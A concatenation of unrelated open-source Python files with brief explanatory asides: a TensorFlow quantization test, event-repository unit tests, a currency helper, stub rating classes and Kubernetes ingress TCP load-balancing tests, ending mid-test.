paddings = tf.constant([[0, 0], [1, 1], [1, 1], [0, 0]])
x_pad = tf.pad(top_relu, paddings, "CONSTANT")
conv_weights = tf.compat.v1.get_variable("weight", [3, 3, 16, 16],
initializer=tf.compat.v1.random_normal_initializer())
conv_weights_2 = tf.compat.v1.get_variable("weight_2", [3, 8, 16, 16],
initializer=tf.compat.v1.random_normal_initializer())
conv = tf.nn.conv2d(x_pad, conv_weights, strides=[1, 2, 2, 1], padding="VALID")
relu = tf.nn.relu(conv)
max_pool = tf.nn.max_pool(relu, ksize=1, strides=[1, 2, 2, 1], padding="SAME")
conv_bias = tf.compat.v1.get_variable("bias", [16],
initializer=tf.compat.v1.random_normal_initializer())
conv_1 = tf.nn.conv2d(max_pool, conv_weights_2, strides=[
1, 2, 2, 1], padding="VALID", name='conv1_3')
conv_bias = tf.math.add(conv_1, conv_bias)
relu6 = tf.nn.relu6(conv_bias, name='op_to_store')
out_name = relu6.name.split(':')[0]
with tf.compat.v1.Session() as sess:
sess.run(tf.compat.v1.global_variables_initializer())
constant_graph = graph_util.convert_variables_to_constants(
sess=sess,
input_graph_def=sess.graph_def,
output_node_names=[out_name])
with gfile.GFile('./test.pb', "wb") as f:
f.write(constant_graph.SerializeToString())
from neural_compressor.experimental import Quantization, common
quantizer = Quantization("./fake_yaml_2.yaml")
dataset = quantizer.dataset('dummy', shape=(100, 56, 56, 16), label=True)
quantizer.calib_dataloader = common.DataLoader(dataset)
quantizer.model = constant_graph
q_model = quantizer.fit()
found_cast_op = False
from neural_compressor.utils.utility import recover
recover_model = recover('./test.pb', './saved/history.snapshot', 0)
q_model_const_value = {}
for node in q_model.graph_def.node:
if node.op == "Const":
tensor_value = tensor_util.MakeNdarray(node.attr["value"].tensor)
if not tensor_value.shape:
q_model_const_value[node.name] = tensor_value
for node in recover_model.graph_def.node:
if node.op == 'Cast':
found_cast_op = True
continue
if node.op == "Const":
tensor_value = tensor_util.MakeNdarray(node.attr["value"].tensor)
if node.name in q_model_const_value:
self.assertEqual(tensor_value, q_model_const_value[node.name])
self.assertTrue(found_cast_op)
if __name__ == "__main__":
unittest.main()
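Both tests above rely on the `disable_random()` decorator to make graph construction deterministic across runs. A minimal stdlib-only sketch of such a seed-pinning decorator (assumed behavior, not the actual `neural_compressor` implementation):

```python
import functools
import random

def disable_random_sketch(seed=1):
    """Decorator that pins the RNG seed before each call (stdlib-only sketch)."""
    def decorator(fn):
        @functools.wraps(fn)
        def wrapper(*args, **kwargs):
            random.seed(seed)  # every call sees the same pseudo-random sequence
            return fn(*args, **kwargs)
        return wrapper
    return decorator

@disable_random_sketch(seed=42)
def sample():
    return [random.random() for _ in range(3)]
```

Because the seed is reset on every invocation, repeated calls return identical values, which is what lets the tests compare constants between `q_model` and the recovered model.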
# test/t1000/unit/infrastructure/persistence/test_events_in_memory_repo.py (helcerion/T1000, MIT)
import unittest
from unittest.mock import patch, Mock
from datetime import datetime
from src.t1000.infrastructure.persistence import EventsInMemoryRepo
class EventsInMemoryRepoTestCase(unittest.TestCase):
def setUp(self):
return super().setUp()
def tearDown(self):
return super().tearDown()
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Event')
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Events')
def test_get_from_date_one_event(self, events_mock, event_mock):
events_in_memory_repo = EventsInMemoryRepo()
events_in_memory_repo.get_from_date('2019-10-16')
event_mock.assert_called_once()
args, kwargs = events_mock.call_args
self.assertEqual(len(args[0]), 1)
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Event')
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Events')
def test_get_from_date_more_events(self, events_mock, event_mock: Mock):
events_in_memory_repo = EventsInMemoryRepo()
events_in_memory_repo.get_from_date('2019-10-15')
self.assertEqual(event_mock.call_count, 5)
args, kwargs = events_mock.call_args
self.assertEqual(len(args[0]), 5)
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Event')
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Events')
def test_get_from_interval(self, events_mock, event_mock):
events_in_memory_repo = EventsInMemoryRepo()
events_in_memory_repo.get_from_interval('2019-10-15', '2019-10-16')
self.assertEqual(event_mock.call_count, 6)
args, kwargs = events_mock.call_args
self.assertEqual(len(args[0]), 6)
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Event')
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Events')
def test_find_all(self, events_mock, event_mock):
events_in_memory_repo = EventsInMemoryRepo()
events_in_memory_repo.find_all()
self.assertEqual(event_mock.call_count, 8)
args, kwargs = events_mock.call_args
self.assertEqual(len(args[0]), 8)
def test_save(self):
event_to_save = Mock(date=datetime.today().date().isoformat())
events_in_memory_repo = EventsInMemoryRepo()
events_in_memory_repo.save(event_to_save)
events_result = events_in_memory_repo.find_all()
self.assertEqual(len(events_result.events), 9)
events_result = events_in_memory_repo.get_from_date(datetime.today().date().isoformat())
self.assertEqual(len(events_result.events), 1)
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Event')
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Events')
def test_events_before_date(self, events_mock, event_mock):
events_in_memory_repo = EventsInMemoryRepo()
events_in_memory_repo.get_from_interval(end='2019-10-10')
self.assertEqual(event_mock.call_count, 2)
args, kwargs = events_mock.call_args
self.assertEqual(len(args[0]), 2)
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Event')
@patch('src.t1000.infrastructure.persistence.events_in_memory_repo.Events')
def test_events_after_date(self, events_mock, event_mock):
events_in_memory_repo = EventsInMemoryRepo()
events_in_memory_repo.get_from_interval(init='2019-10-02')
self.assertEqual(event_mock.call_count, 6)
args, kwargs = events_mock.call_args
self.assertEqual(len(args[0]), 6)
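The tests above exercise date and interval filtering on an in-memory repository. A minimal sketch of the contract they imply (names and event shape are inferred, not the real `EventsInMemoryRepo`); note that ISO-8601 date strings sort correctly under plain string comparison, so no datetime parsing is needed:

```python
class EventsInMemoryRepoSketch:
    """Inferred sketch of an in-memory event repo with ISO-date filtering."""

    def __init__(self, events=None):
        self._events = list(events or [])  # each event: {'date': 'YYYY-MM-DD', ...}

    def save(self, event):
        self._events.append(event)

    def find_all(self):
        return list(self._events)

    def get_from_date(self, date):
        return [e for e in self._events if e['date'] == date]

    def get_from_interval(self, init=None, end=None):
        # Open-ended on either side, mirroring get_from_interval(end=...) above.
        return [e for e in self._events
                if (init is None or e['date'] >= init)
                and (end is None or e['date'] <= end)]

repo = EventsInMemoryRepoSketch([{'date': '2019-10-15'}, {'date': '2019-10-16'}])
repo.save({'date': '2019-10-16'})
```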
# Exercicios/modulos/ex109/moeda.py (anderdot/curso-em-video-python, MIT)
from rotinas import var
def aumentar(preco=0, taxa=0, formato=False):
res = preco + (preco * taxa / 100)
return moeda(res) if formato else res
def diminuir(preco=0, taxa=0, formato=False):
res = preco - (preco * taxa / 100)
return moeda(res) if formato else res
def dobro(preco=0, formato=False):
res = preco * 2
return moeda(res) if formato else res
def metade(preco=0, formato=False):
res = preco / 2
return moeda(res) if formato else res
def moeda(preco=0, moeda='R$ '):
preco = f'{preco:.2f}'.replace('.', ',')
return f'{moeda}{var(preco)}'
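Since the percentage helpers only call `moeda()` when `formato=True`, their behavior can be demonstrated standalone. In this sketch, `var()` is a stand-in for `rotinas.var` (whose real behavior is not shown in the module), so the formatted strings are illustrative:

```python
def var(texto):
    return texto  # stand-in for rotinas.var; the real helper may decorate the text

def aumentar(preco=0, taxa=0, formato=False):
    res = preco + (preco * taxa / 100)
    return moeda(res) if formato else res

def metade(preco=0, formato=False):
    res = preco / 2
    return moeda(res) if formato else res

def moeda(preco=0, moeda='R$ '):
    preco = f'{preco:.2f}'.replace('.', ',')  # Brazilian decimal comma
    return f'{moeda}{var(preco)}'

print(aumentar(100, 10))        # 110.0
print(metade(7, formato=True))  # R$ 3,50
```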
# loldib/getratings/models/NA/na_ahri/na_ahri_sup.py (koliupy/loldib, Apache-2.0)
from getratings.models.ratings import Ratings
class NA_Ahri_Sup_Aatrox(Ratings):
pass
class NA_Ahri_Sup_Ahri(Ratings):
pass
class NA_Ahri_Sup_Akali(Ratings):
pass
class NA_Ahri_Sup_Alistar(Ratings):
pass
class NA_Ahri_Sup_Amumu(Ratings):
pass
class NA_Ahri_Sup_Anivia(Ratings):
pass
class NA_Ahri_Sup_Annie(Ratings):
pass
class NA_Ahri_Sup_Ashe(Ratings):
pass
class NA_Ahri_Sup_AurelionSol(Ratings):
pass
class NA_Ahri_Sup_Azir(Ratings):
pass
class NA_Ahri_Sup_Bard(Ratings):
pass
class NA_Ahri_Sup_Blitzcrank(Ratings):
pass
class NA_Ahri_Sup_Brand(Ratings):
pass
class NA_Ahri_Sup_Braum(Ratings):
pass
class NA_Ahri_Sup_Caitlyn(Ratings):
pass
class NA_Ahri_Sup_Camille(Ratings):
pass
class NA_Ahri_Sup_Cassiopeia(Ratings):
pass
class NA_Ahri_Sup_Chogath(Ratings):
pass
class NA_Ahri_Sup_Corki(Ratings):
pass
class NA_Ahri_Sup_Darius(Ratings):
pass
class NA_Ahri_Sup_Diana(Ratings):
pass
class NA_Ahri_Sup_Draven(Ratings):
pass
class NA_Ahri_Sup_DrMundo(Ratings):
pass
class NA_Ahri_Sup_Ekko(Ratings):
pass
class NA_Ahri_Sup_Elise(Ratings):
pass
class NA_Ahri_Sup_Evelynn(Ratings):
pass
class NA_Ahri_Sup_Ezreal(Ratings):
pass
class NA_Ahri_Sup_Fiddlesticks(Ratings):
pass
class NA_Ahri_Sup_Fiora(Ratings):
pass
class NA_Ahri_Sup_Fizz(Ratings):
pass
class NA_Ahri_Sup_Galio(Ratings):
pass
class NA_Ahri_Sup_Gangplank(Ratings):
pass
class NA_Ahri_Sup_Garen(Ratings):
pass
class NA_Ahri_Sup_Gnar(Ratings):
pass
class NA_Ahri_Sup_Gragas(Ratings):
pass
class NA_Ahri_Sup_Graves(Ratings):
pass
class NA_Ahri_Sup_Hecarim(Ratings):
pass
class NA_Ahri_Sup_Heimerdinger(Ratings):
pass
class NA_Ahri_Sup_Illaoi(Ratings):
pass
class NA_Ahri_Sup_Irelia(Ratings):
pass
class NA_Ahri_Sup_Ivern(Ratings):
pass
class NA_Ahri_Sup_Janna(Ratings):
pass
class NA_Ahri_Sup_JarvanIV(Ratings):
pass
class NA_Ahri_Sup_Jax(Ratings):
pass
class NA_Ahri_Sup_Jayce(Ratings):
pass
class NA_Ahri_Sup_Jhin(Ratings):
pass
class NA_Ahri_Sup_Jinx(Ratings):
pass
class NA_Ahri_Sup_Kalista(Ratings):
pass
class NA_Ahri_Sup_Karma(Ratings):
pass
class NA_Ahri_Sup_Karthus(Ratings):
pass
class NA_Ahri_Sup_Kassadin(Ratings):
pass
class NA_Ahri_Sup_Katarina(Ratings):
pass
class NA_Ahri_Sup_Kayle(Ratings):
pass
class NA_Ahri_Sup_Kayn(Ratings):
pass
class NA_Ahri_Sup_Kennen(Ratings):
pass
class NA_Ahri_Sup_Khazix(Ratings):
pass
class NA_Ahri_Sup_Kindred(Ratings):
pass
class NA_Ahri_Sup_Kled(Ratings):
pass
class NA_Ahri_Sup_KogMaw(Ratings):
pass
class NA_Ahri_Sup_Leblanc(Ratings):
pass
class NA_Ahri_Sup_LeeSin(Ratings):
pass
class NA_Ahri_Sup_Leona(Ratings):
pass
class NA_Ahri_Sup_Lissandra(Ratings):
pass
class NA_Ahri_Sup_Lucian(Ratings):
pass
class NA_Ahri_Sup_Lulu(Ratings):
pass
class NA_Ahri_Sup_Lux(Ratings):
pass
class NA_Ahri_Sup_Malphite(Ratings):
pass
class NA_Ahri_Sup_Malzahar(Ratings):
pass
class NA_Ahri_Sup_Maokai(Ratings):
pass
class NA_Ahri_Sup_MasterYi(Ratings):
pass
class NA_Ahri_Sup_MissFortune(Ratings):
pass
class NA_Ahri_Sup_MonkeyKing(Ratings):
pass
class NA_Ahri_Sup_Mordekaiser(Ratings):
pass
class NA_Ahri_Sup_Morgana(Ratings):
pass
class NA_Ahri_Sup_Nami(Ratings):
pass
class NA_Ahri_Sup_Nasus(Ratings):
pass
class NA_Ahri_Sup_Nautilus(Ratings):
pass
class NA_Ahri_Sup_Nidalee(Ratings):
pass
class NA_Ahri_Sup_Nocturne(Ratings):
pass
class NA_Ahri_Sup_Nunu(Ratings):
pass
class NA_Ahri_Sup_Olaf(Ratings):
pass
class NA_Ahri_Sup_Orianna(Ratings):
pass
class NA_Ahri_Sup_Ornn(Ratings):
pass
class NA_Ahri_Sup_Pantheon(Ratings):
pass
class NA_Ahri_Sup_Poppy(Ratings):
pass
class NA_Ahri_Sup_Quinn(Ratings):
pass
class NA_Ahri_Sup_Rakan(Ratings):
pass
class NA_Ahri_Sup_Rammus(Ratings):
pass
class NA_Ahri_Sup_RekSai(Ratings):
pass
class NA_Ahri_Sup_Renekton(Ratings):
pass
class NA_Ahri_Sup_Rengar(Ratings):
pass
class NA_Ahri_Sup_Riven(Ratings):
pass
class NA_Ahri_Sup_Rumble(Ratings):
pass
class NA_Ahri_Sup_Ryze(Ratings):
pass
class NA_Ahri_Sup_Sejuani(Ratings):
pass
class NA_Ahri_Sup_Shaco(Ratings):
pass
class NA_Ahri_Sup_Shen(Ratings):
pass
class NA_Ahri_Sup_Shyvana(Ratings):
pass
class NA_Ahri_Sup_Singed(Ratings):
pass
class NA_Ahri_Sup_Sion(Ratings):
pass
class NA_Ahri_Sup_Sivir(Ratings):
pass
class NA_Ahri_Sup_Skarner(Ratings):
pass
class NA_Ahri_Sup_Sona(Ratings):
pass
class NA_Ahri_Sup_Soraka(Ratings):
pass
class NA_Ahri_Sup_Swain(Ratings):
pass
class NA_Ahri_Sup_Syndra(Ratings):
pass
class NA_Ahri_Sup_TahmKench(Ratings):
pass
class NA_Ahri_Sup_Taliyah(Ratings):
pass
class NA_Ahri_Sup_Talon(Ratings):
pass
class NA_Ahri_Sup_Taric(Ratings):
pass
class NA_Ahri_Sup_Teemo(Ratings):
pass
class NA_Ahri_Sup_Thresh(Ratings):
pass
class NA_Ahri_Sup_Tristana(Ratings):
pass
class NA_Ahri_Sup_Trundle(Ratings):
pass
class NA_Ahri_Sup_Tryndamere(Ratings):
pass
class NA_Ahri_Sup_TwistedFate(Ratings):
pass
class NA_Ahri_Sup_Twitch(Ratings):
pass
class NA_Ahri_Sup_Udyr(Ratings):
pass
class NA_Ahri_Sup_Urgot(Ratings):
pass
class NA_Ahri_Sup_Varus(Ratings):
pass
class NA_Ahri_Sup_Vayne(Ratings):
pass
class NA_Ahri_Sup_Veigar(Ratings):
pass
class NA_Ahri_Sup_Velkoz(Ratings):
pass
class NA_Ahri_Sup_Vi(Ratings):
pass
class NA_Ahri_Sup_Viktor(Ratings):
pass
class NA_Ahri_Sup_Vladimir(Ratings):
pass
class NA_Ahri_Sup_Volibear(Ratings):
pass
class NA_Ahri_Sup_Warwick(Ratings):
pass
class NA_Ahri_Sup_Xayah(Ratings):
pass
class NA_Ahri_Sup_Xerath(Ratings):
pass
class NA_Ahri_Sup_XinZhao(Ratings):
pass
class NA_Ahri_Sup_Yasuo(Ratings):
pass
class NA_Ahri_Sup_Yorick(Ratings):
pass
class NA_Ahri_Sup_Zac(Ratings):
pass
class NA_Ahri_Sup_Zed(Ratings):
pass
class NA_Ahri_Sup_Ziggs(Ratings):
pass
class NA_Ahri_Sup_Zilean(Ratings):
pass
class NA_Ahri_Sup_Zyra(Ratings):
pass
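Hundreds of near-identical empty subclasses like the ones above can also be generated programmatically. A hedged sketch of that alternative using `type()`, with `Ratings` stubbed and the champion list abbreviated for illustration:

```python
class Ratings:  # stub standing in for getratings.models.ratings.Ratings
    pass

CHAMPIONS = ['Aatrox', 'Ahri', 'Akali']  # abbreviated list for illustration

# type(name, bases, namespace) builds each empty subclass dynamically,
# keyed by the same NA_Ahri_Sup_<Champion> naming scheme used above.
generated = {
    f'NA_Ahri_Sup_{name}': type(f'NA_Ahri_Sup_{name}', (Ratings,), {})
    for name in CHAMPIONS
}
```

Dynamically generated classes cannot be imported by name the way explicit class statements can, which is one reason a codebase might keep the verbose hand-written form.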
# tests/suite/test_transport_server_tcp_load_balance.py (Taymindis/kubernetes-ingress, Apache-2.0)
import pytest
import re
import socket
import time
from urllib3.exceptions import NewConnectionError
from suite.resources_utils import (
wait_before_test,
get_ts_nginx_template_conf,
scale_deployment,
get_events,
wait_for_event_increment,
)
from suite.custom_resources_utils import (
patch_ts_from_yaml,
read_ts,
delete_ts,
create_ts_from_yaml,
)
from settings import TEST_DATA
@pytest.mark.ts
@pytest.mark.skip_for_loadbalancer
@pytest.mark.parametrize(
"crd_ingress_controller, transport_server_setup",
[
(
{
"type": "complete",
"extra_args":
[
"-global-configuration=nginx-ingress/nginx-configuration",
"-enable-leader-election=false"
]
},
{"example": "transport-server-tcp-load-balance"},
)
],
indirect=True,
)
class TestTransportServerTcpLoadBalance:
def restore_ts(self, kube_apis, transport_server_setup) -> None:
"""
Function to revert a TransportServer resource to a valid state.
"""
patch_src = f"{TEST_DATA}/transport-server-tcp-load-balance/standard/transport-server.yaml"
patch_ts_from_yaml(
kube_apis.custom_objects,
transport_server_setup.name,
patch_src,
transport_server_setup.namespace,
)
wait_before_test()
def test_number_of_replicas(
self, kube_apis, crd_ingress_controller, transport_server_setup, ingress_controller_prerequisites
):
"""
The load balancing of TCP should result in 4 servers to match the 4 replicas of a service.
"""
original = scale_deployment(kube_apis.v1, kube_apis.apps_v1_api,
"tcp-service", transport_server_setup.namespace, 4)
num_servers = 0
retry = 0
while num_servers != 4 and retry <= 30:
result_conf = get_ts_nginx_template_conf(
kube_apis.v1,
transport_server_setup.namespace,
transport_server_setup.name,
transport_server_setup.ingress_pod_name,
ingress_controller_prerequisites.namespace
)
pattern = 'server .*;'
num_servers = len(re.findall(pattern, result_conf))
retry += 1
wait_before_test(1)
print(f"Retry #{retry}")
assert num_servers == 4
scale_deployment(kube_apis.v1, kube_apis.apps_v1_api, "tcp-service",
transport_server_setup.namespace, original)
retry = 0
while num_servers != original and retry <= 50:
result_conf = get_ts_nginx_template_conf(
kube_apis.v1,
transport_server_setup.namespace,
transport_server_setup.name,
transport_server_setup.ingress_pod_name,
ingress_controller_prerequisites.namespace
)
pattern = 'server .*;'
num_servers = len(re.findall(pattern, result_conf))
retry += 1
wait_before_test(1)
print(f"Retry #{retry}")
assert num_servers == original
def test_tcp_request_load_balanced(
self, kube_apis, crd_ingress_controller, transport_server_setup, ingress_controller_prerequisites
):
"""
Requests to the load balanced TCP service should result in responses from 3 different endpoints.
"""
wait_before_test()
port = transport_server_setup.public_endpoint.tcp_server_port
host = transport_server_setup.public_endpoint.public_ip
print(f"sending tcp requests to: {host}:{port}")
endpoints = {}
retry = 0
while len(endpoints) != 3 and retry <= 30:
for i in range(20):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.sendall(b'connect')
response = client.recv(4096)
endpoint = response.decode()
print(f' req number {i}; response: {endpoint}')
if endpoint not in endpoints:
endpoints[endpoint] = 1
else:
endpoints[endpoint] = endpoints[endpoint] + 1
client.close()
retry += 1
wait_before_test(1)
print(f"Retry #{retry}")
assert len(endpoints) == 3
result_conf = get_ts_nginx_template_conf(
kube_apis.v1,
transport_server_setup.namespace,
transport_server_setup.name,
transport_server_setup.ingress_pod_name,
ingress_controller_prerequisites.namespace
)
pattern = 'server .*;'
servers = re.findall(pattern, result_conf)
for key in endpoints.keys():
found = False
for server in servers:
if key in server:
found = True
assert found
def test_tcp_request_load_balanced_multiple(
self, kube_apis, crd_ingress_controller, transport_server_setup
):
"""
A second TransportServer with the same listener should be rejected, then accepted once the conflicting TransportServer is deleted, with load balancing working before and after.
"""
port = transport_server_setup.public_endpoint.tcp_server_port
host = transport_server_setup.public_endpoint.public_ip
# Step 1, confirm load balancing is working.
print(f"sending tcp requests to: {host}:{port}")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.sendall(b'connect')
response = client.recv(4096)
endpoint = response.decode()
print(f'response: {endpoint}')
client.close()
assert endpoint != ""
# Step 2, add a second TransportServer with the same port and confirm the collision
transport_server_file = f"{TEST_DATA}/transport-server-tcp-load-balance/second-transport-server.yaml"
ts_resource = create_ts_from_yaml(
kube_apis.custom_objects, transport_server_file, transport_server_setup.namespace
)
wait_before_test()
second_ts_name = ts_resource['metadata']['name']
response = read_ts(
kube_apis.custom_objects,
transport_server_setup.namespace,
second_ts_name,
)
assert (
response["status"]
and response["status"]["reason"] == "Rejected"
and response["status"]["state"] == "Warning"
and response["status"]["message"] == "Listener tcp-server is taken by another resource"
)
# Step 3, remove the default TransportServer with the same port
delete_ts(kube_apis.custom_objects, transport_server_setup.resource,
transport_server_setup.namespace)
wait_before_test()
response = read_ts(
kube_apis.custom_objects,
transport_server_setup.namespace,
second_ts_name,
)
assert (
response["status"]
and response["status"]["reason"] == "AddedOrUpdated"
and response["status"]["state"] == "Valid"
)
# Step 4, confirm load balancing is still working.
print(f"sending tcp requests to: {host}:{port}")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.sendall(b'connect')
response = client.recv(4096)
endpoint = response.decode()
print(f'response: {endpoint}')
client.close()
assert endpoint != ""
# cleanup
delete_ts(kube_apis.custom_objects, ts_resource, transport_server_setup.namespace)
transport_server_file = f"{TEST_DATA}/transport-server-tcp-load-balance/standard/transport-server.yaml"
create_ts_from_yaml(
kube_apis.custom_objects, transport_server_file, transport_server_setup.namespace
)
wait_before_test()
def test_tcp_request_load_balanced_wrong_port(
self, kube_apis, crd_ingress_controller, transport_server_setup
):
"""
Requests to a TransportServer that references the wrong service port should be reset.
"""
patch_src = f"{TEST_DATA}/transport-server-tcp-load-balance/wrong-port-transport-server.yaml"
patch_ts_from_yaml(
kube_apis.custom_objects,
transport_server_setup.name,
patch_src,
transport_server_setup.namespace,
)
wait_before_test()
port = transport_server_setup.public_endpoint.tcp_server_port
host = transport_server_setup.public_endpoint.public_ip
print(f"sending tcp requests to: {host}:{port}")
for i in range(3):
try:
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.sendall(b'connect')
except ConnectionResetError as E:
print("The expected exception occurred:", E)
self.restore_ts(kube_apis, transport_server_setup)
def test_tcp_request_load_balanced_missing_service(
self, kube_apis, crd_ingress_controller, transport_server_setup
):
"""
Requests to the load balanced TCP service should result in responses from 3 different endpoints.
"""
patch_src = f"{TEST_DATA}/transport-server-tcp-load-balance/missing-service-transport-server.yaml"
patch_ts_from_yaml(
kube_apis.custom_objects,
transport_server_setup.name,
patch_src,
transport_server_setup.namespace,
)
wait_before_test()
port = transport_server_setup.public_endpoint.tcp_server_port
host = transport_server_setup.public_endpoint.public_ip
print(f"sending tcp requests to: {host}:{port}")
for i in range(3):
try:
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.sendall(b'connect')
except ConnectionResetError as E:
print("The expected exception occurred:", E)
self.restore_ts(kube_apis, transport_server_setup)
def make_holding_connection(self, host, port):
print(f"sending tcp requests to: {host}:{port}")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.sendall(b'hold')
response = client.recv(4096)
endpoint = response.decode()
print(f'response: {endpoint}')
return client
def test_tcp_request_max_connections(
self, kube_apis, crd_ingress_controller, transport_server_setup, ingress_controller_prerequisites
):
"""
The config, maxConns, should limit the number of open TCP connections.
3 replicas of max 2 connections is 6, so making the 7th connection will fail.
"""
# step 1 - set max connections to 2 with 1 replica
patch_src = f"{TEST_DATA}/transport-server-tcp-load-balance/max-connections-transport-server.yaml"
patch_ts_from_yaml(
kube_apis.custom_objects,
transport_server_setup.name,
patch_src,
transport_server_setup.namespace,
)
wait_before_test()
configs = 0
retry = 0
while configs != 3 and retry <= 30:
result_conf = get_ts_nginx_template_conf(
kube_apis.v1,
transport_server_setup.namespace,
transport_server_setup.name,
transport_server_setup.ingress_pod_name,
ingress_controller_prerequisites.namespace
)
pattern = 'max_conns=2'
configs = len(re.findall(pattern, result_conf))
retry += 1
wait_before_test(1)
print(f"Retry #{retry}")
assert configs == 3
# step 2 - make the number of allowed connections
port = transport_server_setup.public_endpoint.tcp_server_port
host = transport_server_setup.public_endpoint.public_ip
clients = []
for i in range(6):
c = self.make_holding_connection(host, port)
clients.append(c)
# step 3 - assert the next connection fails
try:
c = self.make_holding_connection(host, port)
# making a connection should fail and throw an exception
assert c is None
except ConnectionResetError as E:
print("The expected exception occurred:", E)
for c in clients:
c.close()
# step 4 - revert to config with no max connections
patch_src = f"{TEST_DATA}/transport-server-tcp-load-balance/standard/transport-server.yaml"
patch_ts_from_yaml(
kube_apis.custom_objects,
transport_server_setup.name,
patch_src,
transport_server_setup.namespace,
)
wait_before_test()
# step 5 - confirm making lots of connections doesn't cause an error
clients = []
for i in range(24):
c = self.make_holding_connection(host, port)
clients.append(c)
for c in clients:
c.close()
def test_tcp_request_load_balanced_method(
self, kube_apis, crd_ingress_controller, transport_server_setup, ingress_controller_prerequisites
):
"""
Update load balancing method to 'hash'. This send requests to a specific pod based on it's IP. In this case
resulting in a single endpoint handling all the requests.
"""
# Step 1 - set the load balancing method.
patch_src = f"{TEST_DATA}/transport-server-tcp-load-balance/method-transport-server.yaml"
patch_ts_from_yaml(
kube_apis.custom_objects,
transport_server_setup.name,
patch_src,
transport_server_setup.namespace,
)
wait_before_test()
num_servers = 0
retry = 0
while num_servers != 3 and retry <= 30:
result_conf = get_ts_nginx_template_conf(
kube_apis.v1,
transport_server_setup.namespace,
transport_server_setup.name,
transport_server_setup.ingress_pod_name,
ingress_controller_prerequisites.namespace
)
pattern = 'server .*;'
num_servers = len(re.findall(pattern, result_conf))
retry += 1
wait_before_test(1)
print(f"Retry #{retry}")
assert num_servers == 3
# Step 2 - confirm all request go to the same endpoint.
port = transport_server_setup.public_endpoint.tcp_server_port
host = transport_server_setup.public_endpoint.public_ip
endpoints = {}
retry = 0
while len(endpoints) != 1 and retry <= 30:
for i in range(20):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.sendall(b'connect')
response = client.recv(4096)
endpoint = response.decode()
print(f' req number {i}; response: {endpoint}')
if endpoint not in endpoints:
endpoints[endpoint] = 1
else:
endpoints[endpoint] = endpoints[endpoint] + 1
client.close()
retry += 1
wait_before_test(1)
print(f"Retry #{retry}")
assert len(endpoints) == 1
# Step 3 - restore to default load balancing method and confirm requests are balanced.
self.restore_ts(kube_apis, transport_server_setup)
wait_before_test()
endpoints = {}
retry = 0
while len(endpoints) != 3 and retry <= 30:
for i in range(20):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.sendall(b'connect')
response = client.recv(4096)
endpoint = response.decode()
print(f' req number {i}; response: {endpoint}')
if endpoint not in endpoints:
endpoints[endpoint] = 1
else:
endpoints[endpoint] = endpoints[endpoint] + 1
client.close()
retry += 1
wait_before_test(1)
print(f"Retry #{retry}")
assert len(endpoints) == 3
@pytest.mark.skip_for_nginx_oss
def test_tcp_passing_healthcheck_with_match(
self, kube_apis, crd_ingress_controller, transport_server_setup, ingress_controller_prerequisites
):
"""
Configure a passing health check and check that all backend pods return responses.
"""
# Step 1 - configure a passing health check
patch_src = f"{TEST_DATA}/transport-server-tcp-load-balance/passing-hc-transport-server.yaml"
patch_ts_from_yaml(
kube_apis.custom_objects,
transport_server_setup.name,
patch_src,
transport_server_setup.namespace,
)
# 4s includes 3s timeout for a health check to fail in case of a connection timeout to a backend pod
wait_before_test(4)
result_conf = get_ts_nginx_template_conf(
kube_apis.v1,
transport_server_setup.namespace,
transport_server_setup.name,
transport_server_setup.ingress_pod_name,
ingress_controller_prerequisites.namespace
)
match = f"match_ts_{transport_server_setup.namespace}_transport-server_tcp-app"
assert "health_check interval=5s" in result_conf
assert f"passes=1 jitter=0s fails=1 match={match}" in result_conf
assert "health_check_timeout 3s;"
assert 'send "health"' in result_conf
assert 'expect "healthy"' in result_conf
# Step 2 - confirm load balancing works
port = transport_server_setup.public_endpoint.tcp_server_port
host = transport_server_setup.public_endpoint.public_ip
endpoints = {}
retry = 0
while len(endpoints) != 3 and retry <= 30:
for i in range(20):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.sendall(b'connect')
response = client.recv(4096)
endpoint = response.decode()
print(f' req number {i}; response: {endpoint}')
if endpoint not in endpoints:
endpoints[endpoint] = 1
else:
endpoints[endpoint] = endpoints[endpoint] + 1
client.close()
retry += 1
wait_before_test(1)
print(f"Retry #{retry}")
assert len(endpoints) == 3
# Step 3 - restore
self.restore_ts(kube_apis, transport_server_setup)
@pytest.mark.skip_for_nginx_oss
def test_tcp_failing_healthcheck_with_match(
self, kube_apis, crd_ingress_controller, transport_server_setup, ingress_controller_prerequisites
):
"""
Configure a failing health check and check that NGINX Plus resets connections.
"""
# Step 1 - configure a failing health check
patch_src = f"{TEST_DATA}/transport-server-tcp-load-balance/failing-hc-transport-server.yaml"
patch_ts_from_yaml(
kube_apis.custom_objects,
transport_server_setup.name,
patch_src,
transport_server_setup.namespace,
)
# 4s includes 3s timeout for a health check to fail in case of a connection timeout to a backend pod
wait_before_test(4)
result_conf = get_ts_nginx_template_conf(
kube_apis.v1,
transport_server_setup.namespace,
transport_server_setup.name,
transport_server_setup.ingress_pod_name,
ingress_controller_prerequisites.namespace
)
match = f"match_ts_{transport_server_setup.namespace}_transport-server_tcp-app"
assert "health_check interval=5s" in result_conf
assert f"passes=1 jitter=0s fails=1 match={match}" in result_conf
assert "health_check_timeout 3s"
assert 'send "health"' in result_conf
assert 'expect "unmatched"' in result_conf
# Step 2 - confirm load balancing doesn't work
port = transport_server_setup.public_endpoint.tcp_server_port
